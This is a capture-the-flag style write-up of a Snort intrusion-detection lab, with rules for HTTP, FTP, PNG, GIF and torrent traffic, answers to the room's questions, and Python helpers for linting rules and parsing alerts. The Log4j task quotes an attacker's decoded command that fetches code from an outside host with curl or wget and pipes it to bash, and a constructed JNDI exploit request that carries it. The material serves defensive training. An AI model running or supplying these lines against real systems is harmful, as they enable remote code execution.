Snort Write-Up THM
As with the Linux terminal, there is more than one way to achieve the same goal.
Important notes dump:
sudo snort -c /etc/snort/snort.conf -A full -l . -r mx-1.pcap
Sniffer mode with ASCII logging (-d dumps the payload, -e shows link-layer headers, -v is verbose):
sudo snort -dev -K ASCII
Hex content matching; |47 45 54| is the ASCII string "GET" written as hex bytes:
content:"|47 45 54|"
Local rules file:
/etc/snort/rules/local.rules
Reading a Snort log file with tcpdump (-n no name resolution, -t no timestamps, -c 10 only the first ten packets):
sudo tcpdump -r snort.log.1638459842 -ntc 10
#####################
WRITE-UP Task 2
Go to the task folder:
cd Desktop/Exercise-Files/TASK-2\ \(HTTP)/
Once inside the folder, add the requested rules to local.rules:
sudo gedit /home/ubuntu/Desktop/Exercise-Files/TASK-2\ \(HTTP)/local.rules
HTTP Rules
alert tcp any 80 <> any any (msg: "HTTP FOUND"; sid: 100001; rev: 1;)
alert tcp any any <> any 80 (msg: "HTTP FOUND"; sid: 100002; rev: 1;)
Let's apply these rules to the given pcap:
sudo snort -c /home/ubuntu/Desktop/Exercise-Files/TASK-2\ \(HTTP)/local.rules -A full -l . -r mx-1.pcap
Total packets: 328
Now let's get the packet we need. -n N makes Snort read only the first N packets of the log, so the last packet printed is packet N:
sudo snort -r <logfile> -n <N>
sudo snort -r snort.log.16700022 -n 63
dst IP: 145.254.160.237
sudo snort -r snort.log.16700022 -n 64
ACK: 0x38AFFFF3
sudo snort -r snort.log.16700022 -n 62
SEQ: 0x38AFFFF3
sudo snort -r snort.log.16700022 -n 65
TTL: 128
Src IP: 145.254.160.237
Src Port: 3372
etc..
Task 3:
Task folder: Desktop/Exercise-Files/TASK-3 (FTP)
Add your own rules:
gedit local.rules
FTP rules:
alert tcp any 21 <> any any (msg: "FTP FOUND"; sid: 100001; rev: 1;)
alert tcp any any <> any 21 (msg: "FTP FOUND"; sid: 100002; rev: 1;)
sudo snort -c /home/ubuntu/Desktop/Exercise-Files/TASK-3\ \(FTP)/local.rules -A full -l . -r ftp-png-gif.pcap
Total packets: 614
Now we can analyze the logged traffic; -d dumps the application-layer payload and the quoted BPF filter limits the output to the FTP control channel:
sudo snort -r snort.log.1565 -d "tcp and port 21" -n 10
FTP service name: Microsoft FTP Service
Failed login attempts
alert tcp any any <> any 21 (msg: "Failed FTP Login"; content:"530 User"; sid: 100003; rev: 1;)
Hint: Each failed FTP login attempt prompts a default message with the pattern; "530 User". Try to filter the given pattern in the inbound FTP traffic
Ans: 41
Write a rule to detect successful FTP logins in the given pcap.
alert tcp any any <> any 21 (msg: "Successful FTP Login"; content:"230 User"; sid: 100004; rev: 1;)
Ans:1
Write a rule to detect failed FTP login attempts with a valid username but a bad password or no password.
Useful resource: https://hstechdocs.helpsystems.com/manuals/globalscape/cuteftpmacpro3/Numbered_FTP_status_and_error_codes.htm
Hint: Each FTP login attempt with a valid username and bad password prompts a default message with the pattern; "331 Password". Try to filter the given pattern in the FTP traffic. Try to filter the given username.
alert tcp any any <> any 21 (msg: "Failed FTP/Good_Usr/BadPass"; content:"331 Password"; sid: 100006; rev: 1;)
(sid bumped so it does not collide with the rules above if they are all kept in the same file)
Ans:42
Write a rule to detect failed FTP login attempts with "Administrator" username but a bad password or no password.
Hint: You can use the "content" filter more than one time.
alert tcp any any <> any 21 (msg: "Failed Admin Login Attempt"; content:"Administrator"; content:"331 Password"; sid: 100005; rev: 1;)
Ans: 7
sudo snort -c local.rules -dev -l . -r ftp-png......
Task 4
Write a rule to detect the PNG file in the given pcap.
Reference: list of file signatures (magic numbers) on Wikipedia.
Please, if you use Wikipedia, offer it a coffee a year for the service :)
It is open source, but in this world nothing is for free.
Put the hex bytes between pipes |...|; the pipes tell Snort that the content is binary (hex) data. 89 50 4E 47 0D 0A 1A 0A is the PNG signature:
alert tcp any any <> any any (msg: "PNG FOUND"; content: "|89 50 4E 47 0D 0A 1A 0A|"; sid: 1000001; rev:01;)
sudo snort -r snort.log.16... -A cmg
(-A cmg prints each alert together with the packet data, so the text embedded in the image is visible.)
Ans: Adobe ImageReady
Write a rule to detect the GIF file in the given pcap.
Reference: same as above.
A GIF starts with either GIF87a or GIF89a; in hex GIF87a is 47 49 46 38 37 61, so these two rules are equivalent:
alert tcp any any <> any any (msg: "GIF FOUND"; content: "|47 49 46 38 37 61|"; sid: 1000001; rev:01;)
alert tcp any any <> any any (msg: "GIF FOUND"; content: "GIF87a"; sid: 1000001; rev:01;)
(Pipes are only for hex bytes: writing "|GIF87a|" would make Snort try to read GIF87a as hex and reject the rule.)
alert tcp any any <> any any (msg:"GIF FOUND"; content:"GIF89a"; sid:1000001; rev:01;)
sudo snort -d -r snort.log.1515
Ans: GIF89a
Task 5
Write a rule to detect the torrent metafile in the given pcap.
Personally, I used the content string:
alert tcp any any <> any any (msg:"TORRENT FOUND"; content:"torrent"; sid:1000001; rev:01;)
sudo snort -c local.rules -A full -l . -r torrent.....
Ans:2
What is the name of the torrent application?
xbittorrent
What is the MIME (Multipurpose Internet Mail Extensions) type of the torrent metafile?
application/x-bittorrent
What is the hostname of the torrent metafile?
tracker2.torrentbox.com
Task 6
You can test each ruleset with the following command structure:
sudo snort -c local-X.rules -r mx-1.pcap -A console
Fix the syntax error in local-1.rules file and make it work smoothly.
What is the number of the detected packets?
Add the missing space after 'any'.
16
Fix the syntax error in local-2.rules file and make it work smoothly.
Add 'any' for the port number.
What is the number of the detected packets?
68
Fix the syntax error in local-3.rules file and make it work smoothly.
Check the sid number.
What is the number of the detected packets?
87
Fix the syntax error in local-4.rules file and make it work smoothly.
Sid number, and semicolons instead of double colons.
What is the number of the detected packets?
90
Fix the syntax error in local-5.rules file and make it work smoothly.
Colons, and the direction operator ->.
What is the number of the detected packets?
155
Fix the logical error in local-6.rules file and make it work smoothly to create alerts.
67 65 74 is hex for "get"; add nocase; after the first content so the match is case-insensitive.
What is the number of the detected packets?
2
Fix the logical error in local-7.rules file and make it work smoothly to create alerts.
2E 68 74 6D 6C is hex for ".html".
The rule is missing the message option.
What is the name of the required option?
msg
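As an added example (written for this write-up, not part of the room and not Snort's own parser), here is a small Python linter that catches the classes of mistakes listed above: missing spaces or ports in the header, a wrong direction operator, colons where semicolons belong, a missing msg or sid, and a sid reused by two rules. The sample rules it runs on are constructed to mirror those error classes; they are not the contents of the room's local-1 to local-7 files.

```python
import re

# Snort 2 rule shapes this linter understands. It is deliberately small: the
# authoritative check is still Snort's own config test (snort -T -c <rules>).
ACTIONS = {"alert", "log", "pass", "drop", "reject", "sdrop"}
PROTOCOLS = {"tcp", "udp", "icmp", "ip"}
# header: action proto src sport direction dst dport ( options )
HEADER_RE = re.compile(
    r"^(?P<action>\S+)\s+(?P<proto>\S+)\s+(?P<src>\S+)\s+(?P<sport>\S+)\s+"
    r"(?P<dir>\S+)\s+(?P<dst>\S+)\s+(?P<dport>\S+)\s*\((?P<opts>.*)\)\s*$"
)
# 'any', a port, a range (80:90, :1024, 1024:), optionally negated, or a $VARIABLE
PORT_RE = re.compile(r"^(any|!?\d{1,5}(:\d{0,5})?|!?:\d{1,5}|!?\$\w+)$")
SID_RE = re.compile(r"\bsid\s*:\s*(\d+)")


def split_options(body):
    """Split the option body on ';' outside double quotes, honouring backslash escapes.
    Returns (options, terminated); terminated is False when text is left after the
    last ';', i.e. an option was not closed with a semicolon."""
    opts, cur, in_quote, escaped = [], [], False, False
    for ch in body:
        if escaped:
            cur.append(ch)
            escaped = False
        elif ch == "\\":
            cur.append(ch)
            escaped = True
        elif ch == '"':
            cur.append(ch)
            in_quote = not in_quote
        elif ch == ";" and not in_quote:
            opts.append("".join(cur).strip())
            cur = []
        else:
            cur.append(ch)
    leftover = "".join(cur).strip()
    return [o for o in opts if o], leftover == ""


def lint_rule(rule):
    """Return the list of problems found in one rule line (empty list = looks fine)."""
    problems = []
    m = HEADER_RE.match(rule.strip())
    if not m:
        return ["header must be: action proto src sport dir dst dport (options); "
                "check spacing and that both ports are present"]
    h = m.groupdict()
    if h["action"] not in ACTIONS:
        problems.append(f"unknown action {h['action']!r}")
    if h["proto"] not in PROTOCOLS:
        problems.append(f"unknown protocol {h['proto']!r}")
    if h["dir"] not in ("->", "<>"):
        problems.append(f"bad direction operator {h['dir']!r} (use -> or <>)")
    for field in ("sport", "dport"):
        if not PORT_RE.match(h[field]):
            problems.append(f"{field} {h[field]!r} is not a port, range, variable or 'any'")
    opts, terminated = split_options(h["opts"])
    if not terminated:
        problems.append("every option must end with ';' (colons separate a keyword from its value)")
    seen = {}
    for opt in opts:
        name, _, value = opt.partition(":")
        name = name.strip()
        if not re.fullmatch(r"\w+", name):
            problems.append(f"malformed option {opt!r}")
            continue
        seen.setdefault(name, value.strip())
    if "msg" not in seen:
        problems.append("missing msg option")
    if "sid" not in seen:
        problems.append("missing sid option")
    elif not seen["sid"].isdigit():
        problems.append(f"sid {seen['sid']!r} is not a number")
    return problems


def lint_rules(text):
    """Lint every rule line of a rules file and flag sids reused across rules.
    Returns {line_number: [problems]} for each non-empty, non-comment line."""
    report, sid_lines = {}, {}
    for n, line in enumerate(text.splitlines(), 1):
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        report[n] = lint_rule(line)
        m = SID_RE.search(line)
        if m:
            sid_lines.setdefault(m.group(1), []).append(n)
    for sid, lines in sid_lines.items():
        if len(lines) > 1:
            for n in lines:
                report[n].append(f"sid {sid} is used more than once (lines {lines})")
    return report


# Constructed rules mirroring the error classes described for local-1 .. local-7.
# They were written for this example and are not the room's actual files.
SAMPLE_RULES = """\
# spacing, missing port, duplicate sid, colons for semicolons, bad direction, no msg, one clean rule
alert tcp any any <> anyany (msg:"HTTP FOUND"; sid:100001; rev:1;)
alert tcp any <> any 80 (msg:"HTTP FOUND"; sid:100002; rev:1;)
alert tcp any any <> any 80 (msg:"HTTP FOUND"; sid:100003; rev:1;)
alert tcp any 80 <> any any (msg:"HTTP FOUND"; sid:100003; rev:1;)
alert tcp any any <> any 80 (msg:"HTTP FOUND": sid:100004: rev:1:)
alert tcp any any => any 80 (msg:"HTTP FOUND"; sid:100005; rev:1;)
alert tcp any any <> any 80 (sid:100006; rev:1;)
alert tcp any any <> any 80 (msg:"HTTP FOUND"; sid:100007; rev:1;)
"""

if __name__ == "__main__":
    for n, problems in sorted(lint_rules(SAMPLE_RULES).items()):
        print(f"line {n}: {'OK' if not problems else '; '.join(problems)}")
```

Run it as-is to see one finding per broken sample rule, or import lint_rules and feed it a real local.rules; a clean rule reports an empty list. It complements rather than replaces `snort -T -c <rules>`, which is what actually decides whether Snort loads the file.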
Task 7
Use the given rule file (local.rules) to investigate the MS17-010 exploitation.
sudo snort -c local.rules -r ms17.... -A console
What is the number of detected packets?
25154
Clear the previous log and alarm files.
Use local-1.rules empty file to write a new rule to detect payloads containing the "\IPC$" keyword.
alert tcp any any <> any any (msg:"IPC FOUND"; content:"IPC$"; nocase; sid:1000001; rev:1;)
To include the backslash in the pattern as well, escape it: content:"\\IPC$";
What is the number of detected packets?
12
What is the requested path?
Read the log and look at the hex dump of the payload.
\\192.168.116.138\IPC$
What is the CVSS v2 score of the MS17-010 vulnerability?
Check the NIST database
9.3
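The content option has come up in Tasks 3, 4, 6 and 7: hex between pipes, plain text, nocase, and escaping a backslash. The following Python is an added example written for this write-up (not Snort's code and not from the room): it re-implements just enough of content parsing and matching to run those rules against constructed payloads without a pcap. The payloads are made up for illustration; the FTP replies only imitate the Microsoft FTP Service wording, and the SMB fragment is not the packet from the pcap.

```python
def parse_content(spec):
    """Convert the text between the quotes of content:"..." into raw bytes.
    Between a pair of | characters the text is hex byte pairs (spaces ignored);
    outside them characters are literal, and a backslash escapes the next character
    (so \\ is one backslash, \" one quote, \; one semicolon, \| one pipe)."""
    out, i, in_hex = bytearray(), 0, False
    while i < len(spec):
        ch = spec[i]
        if ch == "|":
            in_hex = not in_hex
            i += 1
        elif in_hex:
            if ch.isspace():
                i += 1
            else:
                out.append(int(spec[i:i + 2], 16))  # ValueError for "|GIF87a|" style mistakes
                i += 2
        elif ch == "\\":
            if i + 1 >= len(spec):
                raise ValueError("dangling backslash")
            out.append(ord(spec[i + 1]))
            i += 2
        else:
            out.append(ord(ch))
            i += 1
    if in_hex:
        raise ValueError("unbalanced | in content")
    return bytes(out)


def is_valid_content(spec):
    """True if the content text parses; "|GIF87a|" is invalid because the pipes
    declare hex and 'G' is not a hex digit."""
    try:
        parse_content(spec)
        return True
    except ValueError:
        return False


def rule_matches(payload, contents):
    """A rule with several content options fires only when every pattern is in the
    payload. contents is a list of (text, nocase) pairs; nocase applies per content."""
    for spec, nocase in contents:
        pattern, hay = parse_content(spec), payload
        if nocase:
            pattern, hay = pattern.lower(), payload.lower()
        if pattern not in hay:
            return False
    return True


def count_matches(rules, payloads):
    """Number of payloads each rule would alert on (one alert per packet per rule)."""
    return {name: sum(rule_matches(p, contents) for p in payloads)
            for name, contents in rules.items()}


# The write-up's rules, expressed as (content text, nocase) lists.
RULES = {
    "HTTP GET (hex, case-sensitive)": [("|47 45 54|", False)],
    "HTTP GET (hex, nocase)":         [("|47 45 54|", True)],
    "PNG FOUND":                      [("|89 50 4E 47 0D 0A 1A 0A|", False)],
    "GIF FOUND (GIF87a)":             [("GIF87a", False)],
    "GIF FOUND (GIF89a)":             [("GIF89a", False)],
    "Failed FTP Login":               [("530 User", False)],
    "Successful FTP Login":           [("230 User", False)],
    "Failed FTP/Good_Usr/BadPass":    [("331 Password", False)],
    "Failed Admin Login Attempt":     [("Administrator", False), ("331 Password", False)],
    "IPC FOUND":                      [("\\\\IPC$", True)],  # \\ in the rule = one literal backslash
}

# Constructed packet payloads (not taken from the room's pcaps). The FTP replies follow the
# "NNN User ..." / "331 Password required for <user>." wording of the Microsoft FTP Service,
# which is why one rule can carry both "Administrator" and "331 Password".
PAYLOADS = [
    b"GET /index.html HTTP/1.1\r\nHost: example.test\r\n\r\n",
    b"get /index.html HTTP/1.1\r\nHost: example.test\r\n\r\n",
    b"\x89PNG\r\n\x1a\n\x00\x00\x00\rIHDR" + b"tEXtSoftware\x00Adobe ImageReady",
    b"GIF87a\x01\x00\x01\x00\x80",
    b"GIF89a\x01\x00\x01\x00\x80",
    b"331 Password required for Administrator.\r\n",
    b"331 Password required for bob.\r\n",
    b"530 User cannot log in.\r\n",
    b"230 User Administrator logged in.\r\n",
    b"\x00\x00\x00\x30\xffSMB" + b"\\\\192.168.116.138\\IPC$\x00",
]

if __name__ == "__main__":
    for name, hits in count_matches(RULES, PAYLOADS).items():
        print(f"{hits:2d}  {name}")
    print('content "|GIF87a|" valid?', is_valid_content("|GIF87a|"))
```

Two things the run makes visible: the same "GET" pattern hits one packet case-sensitively and two with nocase (the Task 6 logical error), and the Administrator rule only needs both contents in a single packet because the server echoes the username in its own 331 reply.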
Task 8
Use the given rule file (local.rules) to investigate the log4j exploitation.
What is the number of detected packets?
26
How many rules were triggered?
The hint recommends using the CLI: read the alert file and grep for something the triggered rules have in common (here, the first digits of their sids):
cat alert | grep "210037*"
4
What are the first six digits of the triggered rule sids?
210037
Use local-1.rules empty file to write a new rule to detect packet payloads between 770 and 855 bytes.
alert tcp any any <> any any (msg:"BYTES FOUND"; dsize:770<>855; sid:1000001; rev:1;)
What is the number of detected packets?
41
What is the name of the used encoding algorithm?
Base64
What is the IP ID of the corresponding packet?
62808
What is the attacker's command?
KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC8xNjIuMC4yMjguMjUzOjgwfHx3Z2V0IC1xIC1PLSA0NS4xNTUuMjA1LjIzMzo1ODc0LzE2Mi4wLjIyOC4yNTM6ODApfGJhc2g=
Decode it with CyberChef (From Base64):
(curl -s 45.155.205.233:5874/162.0.228.253:80||wget -q -O- 45.155.205.233:5874/162.0.228.253:80)|bash
What is the CVSS v2 score of the Log4j vulnerability?
9.3
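To tie the three parts of this task together, here is an added Python example (mine, not from the room or from Snort): it counts the distinct sids in a Snort full-format alert file (what the grep for 210037 approximates), shows the dsize range test, and pulls the Base64 command out of a JNDI lookup string. The alert records and the HTTP request are constructed; the 21003xx sids, the addresses and the `.../Basic/Command/Base64/<data>` path layout are assumptions (the latter is the layout commonly seen in Log4Shell exploitation kits), while the Base64 string is the one from the pcap quoted above.

```python
import base64
import re

ALERT_HEADER_RE = re.compile(r"\[\*\*\] \[(?P<gid>\d+):(?P<sid>\d+):(?P<rev>\d+)\]")
IP_ID_RE = re.compile(r"\bID:(\d+)")
B64_RE = re.compile(r"Base64/([A-Za-z0-9+/=]+)")


def parse_alerts(alert_text):
    """(sid, ip_id) for each record of a Snort 'full' alert file; records are blank-line separated."""
    out = []
    for record in re.split(r"\n\s*\n", alert_text.strip()):
        head = ALERT_HEADER_RE.search(record)
        ip_id = IP_ID_RE.search(record)
        if head:
            out.append((head.group("sid"), int(ip_id.group(1)) if ip_id else None))
    return out


def triggered_sids(alert_text, prefix=""):
    """Distinct sids in the alert file, optionally restricted to those starting with prefix."""
    return sorted({sid for sid, _ in parse_alerts(alert_text) if sid.startswith(prefix)})


def ip_ids_for_sid(alert_text, sid):
    """IP ID of every packet that triggered the given sid (how to find 'the corresponding packet')."""
    return [ip_id for s, ip_id in parse_alerts(alert_text) if s == sid]


def dsize_in_range(payload_len, low, high):
    """Snort's dsize:low<>high test. Assumption: inclusive bounds, as documented for current
    Snort releases; check the manual of the version you run before relying on the edges."""
    return low <= payload_len <= high


def decode_jndi_base64_command(text):
    """Extract the Base64 segment of a JNDI lookup string and decode it to the shell command."""
    m = B64_RE.search(text)
    return base64.b64decode(m.group(1)).decode() if m else None


# Constructed alert records in Snort's full format. The sids and addresses are made up for
# this example; only the record layout is Snort's. 62808 is the IP ID quoted in the write-up.
SAMPLE_ALERT = """\
[**] [1:2100371:1] constructed log4j rule A [**]
[Priority: 0]
12/13-10:00:00.000000 198.51.100.7:51422 -> 10.0.0.8:8983
TCP TTL:64 TOS:0x0 ID:62808 IpLen:20 DgmLen:860 DF

[**] [1:2100372:1] constructed log4j rule B [**]
[Priority: 0]
12/13-10:00:00.000000 198.51.100.7:51422 -> 10.0.0.8:8983
TCP TTL:64 TOS:0x0 ID:62808 IpLen:20 DgmLen:860 DF

[**] [1:2100373:1] constructed log4j rule C [**]
[Priority: 0]
12/13-10:00:00.000000 198.51.100.7:51422 -> 10.0.0.8:8983
TCP TTL:64 TOS:0x0 ID:62808 IpLen:20 DgmLen:860 DF

[**] [1:2100374:1] constructed log4j rule D [**]
[Priority: 0]
12/13-10:00:00.000000 198.51.100.7:51422 -> 10.0.0.8:8983
TCP TTL:64 TOS:0x0 ID:62808 IpLen:20 DgmLen:860 DF

[**] [1:2100371:1] constructed log4j rule A [**]
[Priority: 0]
12/13-10:00:01.000000 198.51.100.7:51424 -> 10.0.0.8:8983
TCP TTL:64 TOS:0x0 ID:62810 IpLen:20 DgmLen:420 DF

[**] [1:1000001:1] BYTES FOUND [**]
[Priority: 0]
12/13-10:00:01.000000 198.51.100.7:51424 -> 10.0.0.8:8983
TCP TTL:64 TOS:0x0 ID:62810 IpLen:20 DgmLen:420 DF
"""

# Base64 string from the write-up above, wrapped in a constructed HTTP request. The
# ".../Basic/Command/Base64/<data>" layout is assumed (common in Log4Shell exploitation kits).
B64 = "KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC8xNjIuMC4yMjguMjUzOjgwfHx3Z2V0IC1xIC1PLSA0NS4xNTUuMjA1LjIzMzo1ODc0LzE2Mi4wLjIyOC4yNTM6ODApfGJhc2g="
SAMPLE_REQUEST = (
    "GET /?x=${jndi:ldap://attacker.test:1389/Basic/Command/Base64/" + B64 + "} HTTP/1.1\r\n"
    "Host: 10.0.0.8:8983\r\n\r\n"
)

if __name__ == "__main__":
    print("rules triggered:", triggered_sids(SAMPLE_ALERT, "210037"))
    print("IP IDs for 2100371:", ip_ids_for_sid(SAMPLE_ALERT, "2100371"))
    print("dsize 770<>855 matches 800 bytes:", dsize_in_range(800, 770, 855))
    print("decoded command:", decode_jndi_base64_command(SAMPLE_REQUEST))
```

Counting distinct sids rather than matching lines matters because one rule can fire on many packets (rule A above fires twice), which is exactly the difference between "how many rules were triggered" and "how many alerts were logged".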
Nice one!!!